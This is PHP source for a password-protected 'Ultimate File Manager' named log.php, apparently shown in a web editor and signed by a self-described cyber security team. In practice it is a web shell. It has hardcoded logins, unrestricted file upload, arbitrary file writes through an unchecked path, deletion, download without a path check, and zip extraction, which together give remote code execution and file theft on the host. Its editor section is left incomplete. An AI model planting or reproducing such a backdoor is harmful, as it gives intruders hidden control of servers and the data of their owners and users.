aibishal

✏️ Editing: log.php

<?php
session_start();

// ===== USERS =====
$users = [
    "admin" => "aibishal",
    "user"  => "Bishal"
];

$base = realpath(__DIR__);

// ===== LOGIN =====
if(isset($_POST['login'])){
    $u = $_POST['u'];
    $p = $_POST['p'];

if(isset($users[$u]) && $users[$u] === $p){
        $_SESSION['user'] = $u;
    } else {
        $err = "Login failed";
    }
}

if(isset($_GET['logout'])){
    session_destroy();
    header("Location: ?");
    exit;
}

if(!isset($_SESSION['user'])){
?>
<form method="post">
<h2>Login</h2>
<input name="u" placeholder="Username">
<input name="p" type="password" placeholder="Password">
<button name="login">Login</button>
<p style="color:red;"><?php echo $err ?? ''; ?></p>
</form>
<?php exit; }

// ===== PATH =====
$cur = $_GET['path'] ?? '';
$path = realpath($base.'/'.$cur);
if(!$path || strpos($path,$base)!==0) $path = $base;

// ===== FUNCTIONS =====
function del($p){
    if(is_dir($p)){
        foreach(scandir($p) as $f){
            if($f!='.'&&$f!='..') del($p.'/'.$f);
        }
        rmdir($p);
    } else unlink($p);
}

function searchFiles($dir,$q,&$res){
    foreach(scandir($dir) as $f){
        if($f=='.'||$f=='..') continue;
        $full = $dir.'/'.$f;
        if(stripos($f,$q)!==false) $res[] = $full;
        if(is_dir($full)) searchFiles($full,$q,$res);
    }
}

// ===== ACTIONS =====

// Upload
if(isset($_FILES['f'])){
    foreach($_FILES['f']['name'] as $k=>$n){
        move_uploaded_file($_FILES['f']['tmp_name'][$k], $path.'/'.basename($n));
    }
}

// Delete
if(isset($_GET['del'])){
    $t = realpath($path.'/'.$_GET['del']);
    if(strpos($t,$base)===0) del($t);
}

// Download
if(isset($_GET['download'])){
    $file = realpath($path.'/'.$_GET['download']);
    if(is_file($file)){
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.basename($file).'"');
        readfile($file);
        exit;
    }
}

// ZIP Create
if(isset($_POST['zip'])){
    $zip = new ZipArchive();
    $zipname = $path.'/archive.zip';
    if($zip->open($zipname, ZipArchive::CREATE)){
        foreach(scandir($path) as $f){
            if(is_file($path.'/'.$f)){
                $zip->addFile($path.'/'.$f,$f);
            }
        }
        $zip->close();
    }
}

// ZIP Extract
if(isset($_GET['unzip'])){
    $zip = new ZipArchive;
    $file = $path.'/'.$_GET['unzip'];
    if($zip->open($file)===TRUE){
        $zip->extractTo($path);
        $zip->close();
    }
}

// Save file
if(isset($_POST['save'])){
    file_put_contents($path.'/'.$_POST['file'], $_POST['code']);
}

// Search
$res = [];
if(isset($_GET['search'])){
    searchFiles($path,$_GET['search'],$res);
}

// ===== FILE LIST =====
$list = scandir($path);
?>

<h2>Ultimate File Manager</h2>
<a href="?logout">Logout</a>

<form method="post" enctype="multipart/form-data">
<input type="file" name="f[]" multiple>
<button>Upload</button>
</form>

<form method="post">
<button name="zip">Create ZIP</button>
</form>

<form>
<input name="search" placeholder="Search files">
<button>Search</button>
</form>

<hr>

<table border="1" cellpadding="6">
<tr><th>Name</th><th>Action</th></tr>

<?php
$data = $res ?: $list;

foreach($data as $f):
$name = is_array($res) && $res ? basename($f) : $f;
$full = is_array($res) && $res ? $f : $path.'/'.$f;

if($name=='.'||$name=='..') continue;
?>

<tr>

<td>
<a href="?path=<?php echo urlencode($cur); ?>&download=<?php echo $name; ?>">Download</a> |
<a href="?path=<?php echo urlencode($cur); ?>&del=<?php echo $name; ?>">Delete</a>

<?php if(pathinfo($name,PATHINFO_EXTENSION)=='zip'): ?>
| <a href="?path=<?php echo urlencode($cur); ?>&unzip=<?php echo $name; ?>">Unzip</a>
<?php endif; ?>

<?php if(is_file($full)): ?>
| <a href="?path=<?php echo urlencode($cur); ?>&edit=<?php echo $name; ?>">Edit</a>
<?php endif; ?>
</td>

</tr>

<?php endforeach; ?>
</table>

<?php
// ===== EDITOR =====
if(isset($_GET['edit'])){
$file = $path.'/'.$_GET['edit'];
if(is_file($file)){
$code = htmlspecialchars(file_get_contents($file));
?>

<?php }} ?>

Gifari Industries - BD Cyber Security Team